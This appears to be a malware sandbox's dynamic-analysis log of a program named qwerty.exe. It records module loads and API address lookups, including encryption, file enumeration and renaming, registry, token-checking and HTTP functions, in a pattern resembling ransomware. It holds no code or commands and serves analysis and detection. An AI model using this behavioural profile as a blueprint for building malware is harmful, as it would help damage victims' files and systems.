Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x74cc87c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x74cc1916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74cdd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x74cc49ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x74cc11e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x74cc14fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x74cc3587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74cc34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x770f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x770f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x74cc4493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x74cc179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x74ced1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x74cc5189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x74cc495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x74ced1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77111f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x74cc1946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77103002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x74cc17b9 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x75592175 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75589679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x7558fc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75592320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x75587d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x755878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75587809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7558787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x755af170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7558b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75588a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75589a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75590dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x755e02bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75593559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x755920ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x75586ffe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75588332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x755890d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x75589785 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77116d39 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74980000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7499c544 True 1
Fn
System Get Time type = System Time, time = 2018-06-04 08:51:37 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74cc359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74cc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x74d4410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74d44195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x74ccd31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x74cdee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7711441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7713c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x74cdf088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7713ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x770f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77141e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x74d44761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74d3cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x74d4424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x74d446b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74d56676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x74d44751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74d565f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x74d447c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74d447e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74d447f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74cdeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 260 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 2
Fn
System Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, base_address = 0x400000 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsMenu, address_out = 0x75595cb1 True 1
Fn
Window Set Attribute index = 0, new_long = 825373492 False 1
Fn
Window Create class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Window Create class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 5
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74cc10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74cdd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74cdd423 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x74cc4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x74cc2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x74cc4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x74cc103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x74cd195c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x74ce2b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74cc192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74d4415b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x74ce8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x74ce896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x74ce735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x770f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74cc1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74cc4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x74cc1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74cc5929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x74cd9af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x74cc4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x74cc54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x74cdd4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x74cd10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x74ccdd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74cc7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x74cc43e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x74cdc860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74cc49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74cc5063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74cc1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77102c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74cc1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x771492b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x74cc418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x74ce828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74cc5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74cdd5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x74cc1909 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74cc1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7712d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74cc3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74cc4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74cc1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74cc34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x74cc1826 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74cc18f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x74cc196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74cc1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x74ce2a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74cc1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74cc1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74cc1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x74cc424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x74ce3102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74cdc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x74cc168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x74cc5558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x74cdd4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x74cc1b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x74cc588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x74cc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x74cc3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74cc3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74cc186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x74cdf7aa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74cc34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x770f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74cc7a10 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x755925cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x7559aea1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x755872c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x75587446 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75591341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75589a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x755878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x755888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75591361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x75590eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75587809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7558b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75588332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x755dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x755890d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75590dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75588a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75589679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7558787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75593559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75592320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x7558fc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x755ae061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x7558b142 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75685689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75684f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x756854f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75685f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x7568ccee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x75686c3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x7568cbfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x75684eb8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x7568d41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x756852d8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x75686001 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75684de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x756858b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x7568b600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x7568522d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x750e40fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x750e469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x750e14d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x750e4304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x750e0e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x750e0e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x750e431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x750d91ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x750ddf14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x750f77cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x750de124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x750dc532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x750f779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x750d8ee9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x750dc51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x750e46ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x750e468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x750e40e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x750e412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x750e157a True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x758a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x758c0468 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x758b3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x758c1e46 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x74ee0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74f1a8c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74f15d77 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x76b40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x76b5ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x76b64fae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x76b6ba12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x76b6492c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x76b64a42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x76b69197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x76b5b406 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75890000 True 1
Fn
